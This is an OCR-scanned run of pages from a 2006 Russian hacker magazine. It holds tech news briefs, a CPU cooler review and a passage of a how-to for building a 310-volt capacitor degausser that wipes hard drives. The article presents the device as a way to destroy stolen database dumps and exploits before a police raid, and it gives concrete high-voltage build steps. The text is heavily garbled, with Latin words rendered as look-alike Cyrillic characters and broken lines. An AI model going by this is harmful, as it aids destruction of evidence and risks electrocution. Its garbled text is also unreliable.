суд. Как, например, Ьа Магтіпіеге — фран- 
цузское издательство, обвинившее Соо§1е 
в нарушении авторских прав. Как ты уже, 
наверное, знаешь, одно из отделений поис- 
ковой компании занимается оцифровкой 
книг нескольких крупнейших библиотек 
мира. Но по закону это можно делать толь- 
ко с разрешения издательств, а Соо§1е не 
спрашивает разрешения. До недавнего вре- 
мени проект книжной оцифровки вызывал 
лишь критику у таких организаций, как 
Аззосіайоп о Г Атегісап ТІпіѵегаіу Ргеззез, 
но теперь Гуглу так просто не отделаться. 
Компания делает упор на старые оциф- 
рованные книги (авторов уже давно нет в 
живых, да и не ради прибыли это делается, 
а чтобы сохранить знания потомкам) . Но 
посмотрим, что скажет суд. 



І_А МАВТІЫІЕВЕ 
ПРОТИВ 
<3000 1_Е 




Бактерия в киберпространстве 

Бактерия Е.СоІі — пока еще не в киберпро- 
странстве, а под микроскопом. 

Водном из прошлых выпусков ты уже читал, как 
ученые впервые оцифровали вирус. Теперь они 
взялись за кишечную палочку — бактерию Е.СоІі. 
И хотят не только ее там смоделировать, но 
и создать ей «реальную» среду, в которой 
она сможетжить. Тогда станет возможным 
изучить не только биохимию палочки, но 
и оцифровать работу генов в реальном 
времени. «Вы только представьте себе, что 
можете сесть за компьютер и проводить над 
животным разные эксперименты, наблюдая, 
как и что работает, попутно выясняя, почему 
это произошло, а это — нет, — рассказывает 
канадский профессор Майкл Эллисон, 
биолог из университета Альберты. — Мы 
не сможем совершить революцию в биоло- 
гии, пока не научимся моделировать живой 
организм». 

Шансы на успех появились у ученых только 
в последние несколько лет, а когда удастся 
достичь результата — можно только гадать. 
И это притом, что ученые замахнулись всего 
лишь на скромного обитателя человечес- 
кого кишечника, который устроен довольно 
просто. Выбор в пользу Е. соіі, одной из 
любимейших учеными модели для биоло- 
гических экспериментов, доктор Эллисон 
объясняет так: «Мы взяли самый простой 
организм, о котором знаем больше всего». 

И вот, с целью оцифровать бактерию в ноябре 
2002-го года был сформирован Международ- 
ный альянс (Іпіегпаііопаі Е. соіі АІІіапсе — ІЕСА). 
В эту организацию вошли канадцы из проек- 
та СуЬегсеІІ, японцы из Института передовых 
биологических наук (ІАВ), англичане из 
группы ІВЕС, американцы из консорци- 
ума Е.соІі, фармацевтическая компания 
ОіахоЗтШпКІіпе и многие другие. 

Альянс распределил задачи между лабора- 
ториями, и началась реализация проектов, 
в ходе которой ученые из разных стран 
объединяют свои усилия. «Но даже если бы 
мы смогли сегодня создать модель всей бак- 
терии, это не означало бы, что мы смогли бы 
понять созданное, — добавляет Тьерри Эмо- 
нет из Чикагского университета. — Хитрость 
в том, что мы должны вести строительство 
шаг за шагом, проверяя и изучая явления по 
очереди». Так, глядишь, лет через 10 дойдут 
и до оцифровки тебя самого. 



I 
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«Теперь могу сказать наверняка: я прозрел! 
Понял, что спам — это зло, и с ним нужно 
бороться. А ведь еще недавно я относил- 



ся к нему, как к игре в кошки -мышки. 

Но общение с господином прокурором, 
товарищем следователем и мистером судьей 
показали мне всю неправоту моих пре- 
жних мыслей. Да, друзья мои, я записался в 
добровольцы антиспамерского движения. 
Скажем решительное «НЕТ» спаму! Смерть 
спамерскому захватчику! » — текст пример- 
но такого содержания опубликовал недавно 
в своем веб-блоге 24-летний техасец Райан 
Питиляк, по мнению экспертов, один 
из 5 самых активных спамеров мира. На 
пике своей карьеры Райан рассылал до 25 
миллионов писем в день! Что же послужи- 
ло причиной озарения? Все просто, война 
Місго50Й против спама привела к аресту 
этого молодого человека, и, чтобы избежать 
долгих лет за решеткой, Питиляк подписал 
с компанией мирное соглашение, стоившее 
ему миллион баксов. Но это не уберегло его 
от общения с доблестной полицией штата, 
а там таких прохиндеев, что и говорить, не 
любят. Теперь бывший спамер считает себя 
«антиспамером-активистом» и обещает 
приложить все усилия в борьбе с такими же, 
каким некогда он бьш сам. 




Кто на свете всех быстрее? 

Конечно, транзисторы, и не простые, а МОЗРЕТ, не- 
давно построенные учеными из Г арварда. Скоростной 
транзистор состоит из германиево-кремниевого ядра и 
кремниевых нанострун. Как говорят эксперты, это самый 
совершенный полевой транзистор, который когда-либо 
был создан. 0е/3і нанострунный полевой РЕТ в 3-4 раза 
быстрее, чем современные кремниевые СМОЗ. Также 
этот нанотранзистор может посоревноваться в области 
быстродействия с обычными плоскими полевыми 
РЕТ'ами, а также с наиболее быстрыми транзисторами 
на основе нанотрубок, которые до настоящего момента 
были абсолютными рекордсменами. Скорее всего, в 
недалеком будущем микроэлектронной индустрии по- 
явится новый стандарт РЕТ-устройств — нанострунный 
0е/3і РЕТ. Также новый нанотранзистор технологически 
совместим с логическими схемами на прозрачных и гиб- 
ких основах- пластике, органических пленках и т.п. 



I Полюс 

Компьютеры 



Высочайшая производительность. 



можно положиться. 



Позвольте сотрудникам реализовать свой потенций я 

Выберите компьютер ‘Передовик ' 1 на Разе двух ь ядер и ого 

процес^ й 

(812) 703-10-50 сетевая интеграция, ноутбуки, 

(812) 325-25-05 рабочие станции и периферия 




Репішт О 

Шве’ 

Дна ядра,. 
Делвй бОйЬШЁ 














ТИёгтаІТаке Роскеі 

Поддерживаемые платформы: 
Зоскеі 940/939/754, ІЗЗА775 
Материалы: медь, алюминий 
Производительность помпы, л/ 
час: 120 

Уровень шума, дБ: 20 
Тип вентилятора: водяная помпа 
Размеры, мм: 60x78x23,5 — тепло- 
обменник; 150x145x640 — радиа- 
тор 

Вес, г: 453 — теплообменник, 4300 
— радиатор 

ВНЕ КОНКУРСА 



Г/1 



Плюсы Тпегтаііаке Носкеі: оче- 
видны: вывод тепла за пределы 
системного блока, практически 
полная беззвучность всей сис- 
темы (работает только водяная 
помпа), хорошая эффективность 
за счет большого количества ох- 
лаждающей жидкости и площади 
радиатора. Осмотрим эту систе- 
му. Радиатор имеет небольшие 
ребра и внутренние трубки, для 
увеличения поверхности тепло- 
обмена. Вторым пунктом идет 
помпа с производительностью 
1 20 литров в час. Монтируется она 
внутри корпуса и подключается к 
внутреннему питанию, тащм обра- 
зом обеспечивается ее ві^Вчение 
одновременно с просыпанием 
компьютера. И самый главный 
элемент системы — водіЛок для 
процессора. Масси вна^медная 
пластина с пластиковой крышкой 
и синим светодиодом призван^ 
отбирать теплоту СРП Главная 
особенность ТИегтаКакё Йаскеі 
— полное отсутствие вентилято- 
ров. За это приходится, платить 
большей температурой и допол- 
нительным местом, которое зани- 
маетогромный радиатор. Водяные 
системы с активным хблодильни- 
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Алексей Шуваев, 1е$1_1аЬ 

(ІезЫаЬ@датеІапсІ.ги) 



Тестовый стенд 

Процессор, ГГ ц: 3,46; Іпіеі Репііит 4 ЕЕ 
Материнская плата: Азиз Р5Ѵ\Ю<32-ѴѴ5 
Видеокарта, Мб: 256, НІЗ Вабеоп XI 300 ІсеЭ 
Память, Мб: 2x512 МЬ Согзаіг ХМ32-4300 
Жесткий диск, Гб: 80, Зеадаіе 7200грт 
Блок питания, Вт: 520 




оооз по коже 



Тест мультиплатформенных кулеров 




ОБЫЧНЫМ ЮЗЕРАМ ДАЖЕ ЛЕТОМ ВПОЛНЕ ХВАТАЕТ БОКСОВЫХ СИСТЕМ ОХ- 
ЛАЖДЕНИЯ, ПОСТАВЛЯЕМЫХ ВМЕСТЕ С ПРОЦЕССОРОМ. НО ЧИТАТЕЛЬ НАШЕГО 
ЖУРНАЛА ПО ОПРЕДЕЛЕНИЮ ОБЫЧНЫМ НЕ ЯВЛЯЕТСЯ :). РАЗОГНАННЫЙ ВДВОЕ 
ПРОЦЕССОР, РАБОТАЮЩАЯ НА ПРЕДЕЛЕ ПАМЯТЬ — ВСЕ ЭТО ТРЕБУЕТ ДОСТОЙ- 
НОГО ОХЛАЖЕНИЯ. 



іезі_ІаЬ выражает 
благодарность за 
предоставленное 
на тестирование 
оборудование 
компаниям: Ыеѵасіа 
(Т.(495)101-2819, 
ѵѵѵѵѵѵ.пеѵасІа.пЛ 
ЗІ_одіс(т.(495)540- 
9136, ѵѵѵѵѵѵ.ЗІоаіс. 

Ш), российским 
представительствам 
компаний (ЗідаЬуІе, 
ЗсуІНе, а также 
европейскому 
представительству 
компании ЗсуіИе. 



Технологии 

Благодаря росту количества транзисторов и тактовой частоты 
процессоры становятся все горячее и горячее. А следователь- 
но, охлаждение должно быть более эффективным. Все чаще ис- 
пользуется тепловые трубы (ЩегтаІ ріре), которые позволяют на 
значительное расстояние разнести теплоприемник и радиатор. 
Запаянные с обоих концов трубки частично заполнены жидкос- 
тью, которая испаряется под действием тепла. Охлаждаясь, пар 
конденсируется и уже в жидком (холодном) состоянии перемеща- 
ется по капиллярам назад. Так энергия переносится с горячего 
конца трубы (процессора) на холодный (радиатор и вентилятор). 
Эта система позволяет эффективно передавать тепло на радиа- 
тор значительно большей площади, чем у обычных кулеров, хотя 
встречаются конструкции штатных размеров. 



Методика тестирования 

Для теста был выбран один из самых горячих процессоров - Іпіеі 
Репііит 4 3.46 Ехігете ЕбШоп. Программа 8&М загружала его на 
100%. Показания термодатчика снимались при помощи Іптопііог 
каждые 30 секунд. Перед установкой кулера поверхность СРІІ 
тщательно очищалась, и наносился тонкий слой термопасты КПТ-8. 
Замер проводился в течение 20 минут, чего вполне хватает для ста- 
билизации температуры (водяную систему мы прогревал и 50 минут 
из-за ее инертности). Там где были реобасы, мы выставляли их 
максимум оборотов. 

Кулеры протестированы в экстремальном режиме: на процесс 
была отключена защита от перегрева, да и приложения пользо] 
теля редко сильно грузят мощный СРІІ. Так что для СРІІ о 
ней производительностью подойдет практически любая д| 
охлаждения из обзора. 




ХАКЕР 07 /91/ 06 



017 



100 

90 

80 

70 

60 

50 

40 

30 



РЕВВІІМ 




Сооіег-Рю 

(ѲН-РСЦ22-ѴѲ) 

Поддерживаемые платформы: 
Зоске! 939/754/478/А, ЦЗА775 
Материалы: медь, алюминий, 
іИегтаІ ріре 

Скорость, об/мин: 2500-4000 
Уровень шума, дБ: 23,7-37,2 
Тип вентилятора: 2 шарикопод- 
шипника 

Размеры, мм: 105x105x119 
Вес, г: 500 



СооІегРго 

(ѲН-РРЦ21-МР) 

Поддерживаемые платформы: 
Зоске! 939/754/478/А, ЦЗА775 
Материалы: медь с никелевым 
покрытием, алюминий, іИегтаІ 
ріре 

Скорость, об/мин: 1700-3200 
Уровень шума, дБ: 21 ,3-40,1 
Тип вентилятора: шарикопод- 
шипник 

Размеры, мм: 1 10x1 10x109 
Вес, г: 430 



СРЦ Сооіег (5СКВК- 
2000) 

Поддерживаемые платформы: 
Зоскеі 940/939/754/478/А, І_(ЗА 
775 

Материалы: медь, алюминий, 
іНегтаІ ріре 

Скорость, об/мин: 1800-3800 
Уровень шума, дБ: 14-46 
Тип вентилятора: шарикопод- 
шипник 

Размеры, мм: 96x94x92 
Вес, г: 700 



Сооіег (ЗСМІЧ-1 000) 

Поддерживаемые платформы: 
Воске! 940/939/754/478/А, БОА 
775 

Материалы: медь, алюминий, 
ІбегтаІ ріре 
Скорость, об/мин: 1500 
Уровень шума, дБ: 22 
Тип вентилятора: 2 шарикопод- 
шипника 

Размеры, мм: 109x105x150 
Вес, г: 560 



тіп 



тіп 



тіп 



тіп 










1 23456789 1011 121314 15 1617 18192021 1 23456789 1011 121314 15 1617 18192021 




********** 

40 $ 

Кулер с футуристическим ди- 
зайном назван ракетой не прос- 
то так: внешний ободок для от- 
водатеплого воздухаобрамляет 
радиатор и создает некое подо- 
бие ступени ракеты. Продолжая 
серию ЗО-кулеров, инженеры 
несколько увеличили размеры 
радиатора, который изготовлен 
из алюминия. Турбина установ- 
лена таким образом, чтобы хо- 
лодный воздух втягивался через 
ребра в верхней части кулера, а 
выходил через нижнюю часть. 
Теплоотвод осуществляется 
двумя термотрубками, скре- 
щивающимися в медном осно- 
вании. Реобас, имеющийся в 
комплекте, позволяет регули- 
ровать скорость вращения вен- 
тилятора от 2500 до 4000 обо- 
ротов в минуту. Стоит отметить, 
что при максимальной скорости 
вращения звук вентилятора 
становится несколько назой- 
ливым. Разработчики обратили 
внимание на поклонников мод- 
динга — четыре ярких светоди- 
ода окрасят внутренности твоей 
машины в синий цвет. Перепад 
температуры в 26 градусов при 
максимальных оборотах можно 
считать приемлемым, так что ку- 
лер имеет право на существова- 
ние в твоей системе. 



********** 

35 $ 

(ЗідаЬу!е (З-Роѵѵег Сооіег Рго 
имеет 4 тепловые трубы. Не- 
большой алюминиевый ради- 
атор расположен на удалении 
и обладает достаточной пло- 
щадью для размещения 1 10 мм 
пропеллера. Идущие в комплек- 
те скобы позволят закрепить 
кулер практически на любой 
распространенной сейчас сис- 
теме. Реобас дает возможность 
регулировки оборотов для 
уменьшения вредного воздейс- 
твия шума на твою и без того не- 
рвную систему. Подключается 
он через специальный контрол- 
лероборотовстремя выходами: 
питание, реобас, разъем под- 
ключения вентилятора. В рабо- 
те ОідаЬу!е С-Роѵѵег РРО вызы- 
вает двойственное чувство. При 
минимальных оборотах и низ- 
кой загрузке процессора (во 
время интернет-серфинга или 
редактирования документов) 
система охлаждения вполне 
справляется со своей задачей. 
При решении более ресурсо- 
емких задач приходится уве- 
личивать частоту вращения 
вентилятора. На скорости 3200 
оборотов в минуту шум превра- 
щается в легкий свист, который 
отчетливо будет слышан даже в 
закрытом блоке. 



********** 

37 $ 

ЗсуіНе КатаЬоко 2 СРІІ Сооіег 
сочетает в себе классическую 
и совершенно новую систе- 
мы: от традиционной модели 
взят алюминиевый радиатор, 
ничем не выделяющийся, но с 
медной вставкой-основанием, 
а новые технологии выражают- 
ся в применении термотрубок. 
Если разобрать кулер на со- 
ставные части, то мы сможем 
наблюдать нечто похожее на 
(ЗідаЬу!е (З-Роѵѵег РРО, но уже с 
радиатором, изготовленным из 
меди. Сочетание термотрубок 
с медным радиатором и после- 
дующее охлаждение алюмини- 
евым сказалось на результате 
— среди тестируемых данный 
кулер смог поддерживать одну 
из самых низких температур. 
Комплект поставки содержит 
реобас, кабели подключения и 
скобы для фиксации на разных 
типах процессоров. Немалый 
вес продиктован размещенной 
в основании медной пластиной. 
Несмотря на то, что максималь- 
ная скорость вращения венти- 
лятора равняется 3000 об/мин, 
шумом эта система не досаж- 
дала. Вручаем этому девайсу 
приз и рекомендуем его для ус- 
тановки в твою тачку. Хорошая 
покупка. 



********** 

45 $ 

Довольно габаритная модель 
имеет необычное размещение 
кулера, обусловленное непри- 
вычной установкой радиато- 
ров. Три термотрубки проходят 
через медное основание и под- 
нимаются, пронизывая алюми- 
ниевые пластины. Между двумя 
радиаторами был установлен 
вентилятор, который затягива- 
ет воздух через один и выдувает 
через другой. Идея повышения 
производительности достаточ- 
но интересная, но на практике 
показала свою несостоятель- 
ность в высокопроизводитель- 
ных системах. Благодаря мед- 
ной пластине теплоотвод 
осуществляется быстро, но 
площадь поверхности радиато- 
ров оказалась недостаточной 
для нашего «экстремального» 
процессора, и температура 
резко поднялась, достигнув от- 
метки в 1 00 градусов. Тест было 
решено прекратить на девятой 
минуте. Но не стоит клеймить 
данный кулер. Его большим его 
плюсом является бесшумность, 
связанная с низкой скоростью 
вращения вентилятора. Цени- 
телям тишины и владельцам не 
самых мощных систем стоит 
присмотреться именно к этой 
модели. 
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Тічѳгтаііаке ВІиѳ ОгЬ 2 Зсуіічѳ Каіапа 2аІтапГаіаМіу 



(СІ.-Р0257) 

Поддерживаемые платформы: 
Воске! 940/939/754/478/А, І_ОА 
775 

Материалы: медь, алюминий 
Скорость, об/мин: 1700 
Уровень шума, дБ: 17 
Тип вентилятора: шарикопод- 
шипник 

Размеры, мм: 140x66 
Вес, г: 869 



СиСРЦСооІег 

(ЗСКТЫ-СШООО) 

Поддерживаемые платформы: 
Воске! 940/939/7 54/47 8/370/А, 
ЦЗА775 

Материалы: медь, іИегтаІ ріре 
Скорость, об/мин: 1 200 - 2500 
Уровень шума, дБ: 15-31 ,6 
Тип вентилятора: шарикопод- 
шипник 

Размеры, мм: 96x138x96 
Вес, г: 590 



РЗ-С77 

Поддерживаемые платформы: 
Воске! 940/939/754/478, І_СА 
775 

Материалы: медь 
Скорость, об/мин: 2400 
Уровень шума, дБ: 42,5 
Тип вентилятора: 2 шарикопод- 
шипника 

Размеры, мм: 136x136x67 
Вес, г: 918 




ТГіегтаІіаке Від 
ТурЬооп (СІ.-Р01 14) 

Поддерживаемые платформы: 
Воске! 940/939/754/478/А, І_СА 
775 

Материалы: медь, алюминий, 
!ИегтаІ ріре 
Скорость, об/мин: 1300 
Уровень шума, дБ: 16 
Тип вентилятора: шарикопод- 



шипник 

Размеры, мм: 122x122x103 
Вес, г: 813 




********** 

35 $ 

Продолжая и развивая тему круг- 
лых радиаторов, ТНегтаІ!аке вы- 
пускает новую модель ВІие ОгЬ 2. 
Медный сердечник и алюминие- 
вые ребра должны обеспечить 
хороший отвод тепла. Алюми- 
ний, окрашенный в синий цвет, 
дополняется светодиодами, 
блики которых красиво играют 
на матовых лопастях вентилято- 
ра. Установка кулера занимает 
некоторое время и предусмат- 
ривает наличие отвертки с длин- 
ным жалом. Подпружиненные 
болты гарантируют плотное 
прилегание плоскости радиа- 
тора к процессору. Обороты 
вентилятора невелики, и, хотя 
диаметр лопастей не больше 60 
мм, воздушный поток довольно 
ощутим — так что окружающие 
детали будут неплохо обдувать- 
ся. Шум, создаваемый вентиля- 
тором, практически неслышим и 
не вызывает дискомфорта. Если 
у тебя небольшой системник, 
обрати внимание на габариты 
радиатора: 14 сантиметров в 
диаметре и почти 7 в высоту 
— может не влезть. ТЬегтаІІаке 
ВІие ОгЬ 2 хорошо справился с 
задачей охлаждения горячего 
камня и имеет неплохой резерв 
для использования разгонного 
потенциала процессора. 



********** 

42 $ 

Вторая модель в линейке Ка- 
іапа, но на сей раз с медным 
радиатором. Дизайн устройс- 
тва одновременно привлекает и 
поражает. До этого можно было 
видеть радиаторы, установлен- 
ные как параллельно основа- 
нию, так и перпендикулярно. 
Но инженеры Зсу!Ие решили 
проблему очень интересно. Ра- 
диатор находится под углом. 
Две тепловые трубки соединяют 
медные пластины с тщательно 
отполированным основанием. 
Мощный вентилятор способен 
вращаться со скоростью до 
2500 оборотов в минуту, при 
этом шум будет минимален. А в 
случае, когдане предвидится ак- 
тивной работы, можно понизить 
обороты до 1200 и наслаждать- 
ся тихим треском винчестера. 
Если установить кулер в нужном 
направлении, можно обеспечить 
охлаждение и пассивному ради- 
атору северного моста, который, 
как правило, находится в непос- 
редственной близости от про- 
цессора. Питание изначально 
подается через реостат, который 
монтируется с задней стороны 
блока. Переходник тоіех будет 
очень кстати, если в системе име- 
ется несколько кулеров и «поса- 
дочные места» заняты. 



********** 

75 $ 

Кулер привлекает внимание 
своим звучным именем, так как 
разрабатывался с участием 
профессионального геймера 
Ра!аІ1!у. Все девайсы, вышед- 
шие под таким брендом, сде- 
ланы с учетом его геймерских 
потребностей. Как и любое 
стильное устройство, он имеет 
моддерскую направленность — 
красные светодиоды привлекут 
внимание к твоему системному 
блоку. Полностью медный ради- 
атор хорошо отводит тепло, но 
имеет существенный недоста- 
ток — весит почти килограмм, 
что при неаккуратном обраще- 
нии грозит поломкой материн- 
ской платы. Установка займет 
немало времени, но гарантиру- 
ет надежное крепление и хоро- 
ший теплоотвод. Хотя кулер не 
показал выдающихся результа- 
тов, опыт работы с системами 
2аІтап говорит о том, что даже 
в случае отказа вентилятора, 
процессор может продержать- 
ся достаточное время, чтобы ты 
успел заметить неисправность 
— радиатор очень теплоемкий. 
Комплектация довольно скуд- 
ная: инструкция и некоторое 
количество обязательных кре- 
пежных элементов. Можно по- 
советовать геймерам-фанатам. 



********** 

50 $ 

При первом взгляде на этот 
Большой Тайфун возникает 
мысль: как это можно размес- 
тить в корпусе? Оказывается, 
можно, но стоит быть внима- 
тельнее во время покупки, 
чтобы потом не пришлось 
менять корпус или вынимать 
блок питания. Мощное медное 
основание можно закрепить 
практически на любом процес- 
соре, но придется немного по- 
возиться с креплениями. Целых 
6 термотрубок ведут от медной 
пластины к большому алюмини- 
евому радиатору. Вентилятор, 
имеющий в диаметре 120 мм, 
вращается со скоростью лишь 
1300 оборотов в минуту, но это- 
го вполне достаточно для ох- 
лаждения процессора. Именно 
поэтому инженеры не стали ис- 
пользовать реостат: повышать 
скорость нет необходимости 
— охлаждение достаточное, 
а понижать нет смысла. Шума 
при работе практически нет, 
гораздо лучше слышен звук 
работающего винчестера. Надо 
отметить и немалый вес всей 
системы — крепи получше :). В 
тестах кулер показал отличные 
результаты, и даем тебе гаран- 
тии, что ты не расстроешься, 
если купишь его :). 
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ВООООМ 



ТЫ НАВЕРНЯКА СЛЫШАЛ МНОЖЕСТВО БАЕК ОБ УСТРОЙСТВАХ ДЛЯ МГНОВЕННОГО УНИЧТОЖЕНИЯ 
ДАННЫХ, ХРАНЯЩИХСЯ НА ЖЕСТКИХ ДИСКАХ, ЯКОБЫ ЕСТЬ ТАКАЯ ПУШКА, КОТОРУЮ НАВОДИШЬ В 
СТОРОНУ КОМПЬЮТЕРА, НАЖИМАЕШЬ НА КУРОК, И ПОСЛЕ ЭТОГО МОЩНЫЙ ИМПУЛЬС ЭЛЕКТРО- 
МАГНИТНОГО ПОЛЯ СТИРАЕТ ВСЕ ДАННЫЕ С ЖЕСТКОГО ДИСКА, ПОПУТНО ВЫЖИГАЯ ВСЮ ЭЛЕКТРО- 
НИКУ В РАДИУСЕ 10-ТИ МЕТРОВ, СОГЛАСИСЬ, ЛЮБОПЫТНАЯ ШТУКА, НЕДАВНО МЫ РЕШИЛИ ПРОВЕ- 
РИТЬ НА ПРАКТИКЕ, НАСКОЛЬКО ВООБЩЕ ВОЗМОЖНО УНИЧТОЖАТЬ ДАННЫЕ МАГНИТНЫМ ПОЛЕМ, И 
СМАСТЕРИЛИ НАСТОЯЩЕГО МОНСТРА: УБИЙЦУ ЖЕСТКИХ ДИСКОВ. 



Вообще, идея такого девайса зрела у меня в 
голове очень давно: еще когда мы делали ста- 
тью о восстановлении данных, я разговорился 
с ребятами в В.І_аЬ, и они рассказали, что у них 
есть возможность достать девайс, мгновенно 
выжигающий всю информацию с хардов. Мне, 
естественно, сразу захотелось достать это ус- 
тройство, провести с ним ряд экспериментов и 
написать для тебя статью. 

Зачем это нам? 

Согласись, чрезвычайно любопытно: возможно 
ли испортить жесткий диск магнитным полем, 
созданным в домашних условиях? Сложно ли 
это сделать? Насколько сильными будут пов- 
реждения? Возможно ли будет восстановить 
хоть часть инфы с поврежденного жесткого 
диска? Развернутые ответы на все эти вопросы 
ты получишь в этой статье. 

Вторая вещь, которая подогревала наш энтузи- 
азм, заключалась в практическом интересе. У 
тебя, как и у всех крутых хакеров, я уверен, на 
жестком диске находится масса очень важной 
и интересной для тебя информации: зловред- 
ные сплоиты, дампы вкусных баз данных, за- 
нимательные логи ісц и так далее. Согласись, 
очень не хочется отдавать всю эту информацию 
отряду ОМОН, который по недоразумению вы- 
шиб дверь в твоей квартире :). Времени, сам 
понимаешь, в такой ситуации очень немного, 
поэтому все программные клинеры идут лесом. 
Нам срочно нужно спаять устройство, которое 
за пару наносекунд не оставит ни бита ценной 
информации натвоем винчестере. 

Поехали 

Достать убийцу ИсІсІ у ребят в РМ_аЬ не получи- 
лось, и я подумал, что это даже к лучшему: куда 
круче самостоятельно сделать такую штуку :). 
Через несколько дней я познакомился с насто- 
ящим техноманьяком Серегой (ЭІіпуі), и мы до- 
говорились, что он сделает девайс и напишет 
об этом в журнале. В один из жарких летних 
вечеров мы встретились у метро и поехали 
в его логово. Надо сказать, квартирка у него 
колоритная. В комнате, где он работает, все за- 
сыпано блоками питания, старыми материнс- 
кими платами, конденсаторами, самодельными 
колонками, ламповыми усилителями, разными 
фрикерскими девайсами и просто отборным 
мусором. Но, видимо, именно такая обста- 
новка сделала этого парня самим собой: па- 
яет он отлично, быстро соображает и каждую 
секунду придумывает 2-3 новых фрикерских 
устройства. 



На этом я (пікііогф заканчиваю введение и отдаю 
тебя в руки техноманьяка Сереги. Сейчас он 
тебе расскажет, как мы убивали винчестеры. 

Детали даи$8 дип 

Идея девайса очень простая: винчестер поме- 
щается в катушку индуктивности (спираль из 
медной проволоки с большим числов витков), 
на которую разряжается конденсатор большой 
емкости. Как тебе известно из школьных уро- 
ков физики, электрический ток, проходя по ка- 
тушке, создает магнитное поле, которое и будет 
стирать инфу с харда. Чем больше напряжение 
заряда, емкость конденсатора и число витков у 
катушки, тем сильнее магнитное поле и больше 
вероятность, что мы убьем жесткий диск. 

Я говорил о конденсаторе в единственном чис- 
ле — на практике же мы будем использовать 
целую батарею конденсаторов. Я заюзал элек- 
тролитические конденсаторы и сетевое напря- 
жение 220 вольт (которое после выпрямления 
достигаетЗЮ В). Был взят обычный компьютер- 
ный БП, в котором уже есть выпрямитель и кон- 
деры. Подойдет для этих целей даже горелый 



резисторы, а заряд сохранялся. Эти резисто- 
ры нужно откусить кусачками или выпаять (см. 
фотографии). Обрати внимание, что после вы- 
прямителя напряжение составляет 31 0 вольт, а 
электролитные кондеры рассчитаны обычно на 
200. Почему же они не взрываются? Дело в том, 
что они включены последовательно, азначит, на 
каждый конденсатор приходится по 155 вольт. 
Но суммарная емкость этих конденсаторов бу- 
дет вполовину меньше написанной на корпусе 
(из-за их последовательного соединения). 

Если БП был рабочим, необходимо перерезать 
все дорожки, ведущие к основной схеме БП. В 
моем случае блок был горелым, и это было не 
актуально. 

На плате БП смонтирована пара здоровых кон- 
денсаторов — два самых больших цилиндрика. 
С одной стороны на пару подается «-», с дру- 
гой — «+». Сами конденсаторы между собой 
соединяются как батарейки в плеере: минус к 
плюсу. Знать это нам нужно, чтобы наращивать 
емкость конденсаторов. Как показала практи- 
ка, стандартных конденсаторов блока питания 
вполне хватает для стирания винта, но мы, для 



внимание! НАПРЯЖЕНИЕ ВЫСОКОЕ: 310 ВОЛЬТ. БУДЬ ПРЕДЕЛЬ- 
НО ОСТОРОЖЕН. РАЗРЯДКУ КОНДЕНСАТОРОВ ОСУЩЕСТВЛЯЙ 
ТОЛЬКО ПРИ ОТКЛЮЧЕНИИ ОТ СЕТИ. ПРИ ЗАМЫКАНИИ ПРО- 
ВОДОВ УЧТИ, ЧТО ИСКРА НАСТОЛЬКО СИЛЬНАЯ, ЧТО В МЕСТЕ 
ЗАМЫКАНИЯ ПРОВОДОВ МЕТАЛЛ ПЛАВИТСЯ И РАЗБРЫЗГИВА- 
ЕТСЯ — МОЖНО ЗАПРОСТО ОСТАТЬСЯ БЕЗ ГЛАЗ. АВТОРА ЭТОЙ 
СТАТЬИ НЕСКОЛЬКО РАЗ ПРИ НАПИСАНИИ БИЛО ТОКОМ, НО, 
УВЫ, ОН ОСТАЛСЯ ЖИВ И ДОПИСАЛ СТАТЬЮ :). 



БП, главное, чтобы работал выпрямительный 
диодный мост, и были живыми кондеры. 

Что касается дросселя , то для его изготовления 
подойдет любой медный кабель достаточной 
длины (хорошо бы метров 20-30 !). 

Модификация БП 

Начнем с самого интересного — с модифика- 
ции блока питания. В компьютерном БП, как 
и во многих импульсных источниках питания, 
выпрямительные конденсаторы подключаются 
параллельно со специальными резисторами, 
которые называются «шунтирующими». Это 
делается для того, чтобы при отключении пита- 
ния конденсаторы сами быстренько разряди- 
лись. Нам как раз нужно, чтобы конденсаторы 
при отключении питания не разряжались на 



верности, подпаяем к ним еще пару электро- 
литических кондеров, взятых из старой совет- 
ской техники. Надо знать, что минус у таких 
конденсаторов находится « под гайкой » , то есть 
на корпусе. Плюс — на центральном контакте. 
Соответственно, нужно припаять минус конден- 
сатора в блоке питания к плюсу внешнего кон- 
дера — его центральному контакту. Это видно 
на наших фотографиях. 

Модифицированный таким образом блок пита- 
ния можно уже использовать для уничтожения 
информации. Поэтому мы готовы провести пер- 
вый опыт. 

Первый опыт 

Для первого опыта я взял обмоточный провод 
с сечением 1 мм и просто намотал его на винт. 



ХАКЕР 07 /91/ 06 



021 



РЕВРШМ 




Слева — хард, убитый в первом опыте, справа — хард, 
готовящийся к истязаниям 





Г отовый для уничтожения винчестер. Пара наносе- 
кунд, и данным абзац 



Закрепляем батарею конденсаторов в корпусе 





Выкусываем шунтирующие резисторы 



Получилось порядка 200-300 витков. Затем я протестиро- 
вал винт (для этого опыта был взят Махіог 80 дЬ с кучей 
бэдов, который ценности не представлял). Я убедился в 
том, что он определяется в биосе, и подпаял один конец 
катушки к « + » конденсаторной батареи блока питания; к 
другому концу дросселя я припаял проводок, конец кото- 
рого покрыл тонким слоем припоя. К минусу нашего бло- 
ка питания я припаял второй проводок. Эти два провода 
служили мне «кнопкой» — для разрядки конденсаторов 
на катушку достаточно просто соединить их. Почему я не 
заюзал культурную кнопку или тумблер? Дело в том, что 
обычная кнопка, рассчитанная на напряжение меньше 
400 вольт, просто выйдет из строя при попытке использо- 
вания: контакты крепко приварятся друг к другу. Подходя- 
щей кнопки под рукой не было, и я решил обойтись просто 
замыканием двух голых проводов. 

Переходим к самой любопытной части опыта. Блок пита- 
ния я закрыл крышкой, чтобы, если конденсаторы вдруг 



взорвутся, остаться целым. БП я подключил через сете- 
вой фильтр — его легко отключить. Включив питание и 
подождав несколько секунд, я отключил блок питания от 
сети и замкнул два описанных выше провода. Произо- 
шел мощный хлопок, и меня ослепила яркая вспышка. 
В это же самое время по намотанной на винчестер ка- 
тушке пробежал очень большой разряд, который создал 
сильное магнитное поле внутри дросселя. Этот мощный 
импульс хаотично переориентировал магнитные домены 
в информационном слое и напрочь убил хард, уничтожив 
всю информацию на нем. 

Проверив хард, я убедился в том, что он не определяется 
в БИОСе и вышел из строя. Это, в общем-то, логично: 
системная информацияхранится наблинах, итеперьона 
затерта. Однако меня не покидала одна мысль: я не снял 
контроллер с винта, и магнитное поле могло просто убить 
всю электронику. Поэтому пришлось провести второй 
опыт: я взял древний 500 Мб Зеадаіе, увеличил емкость 
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Процесс намотки витухи. Занудное занятие, я тебе 
скажу 



Винт помещается в пластиковую коробку, на которую 
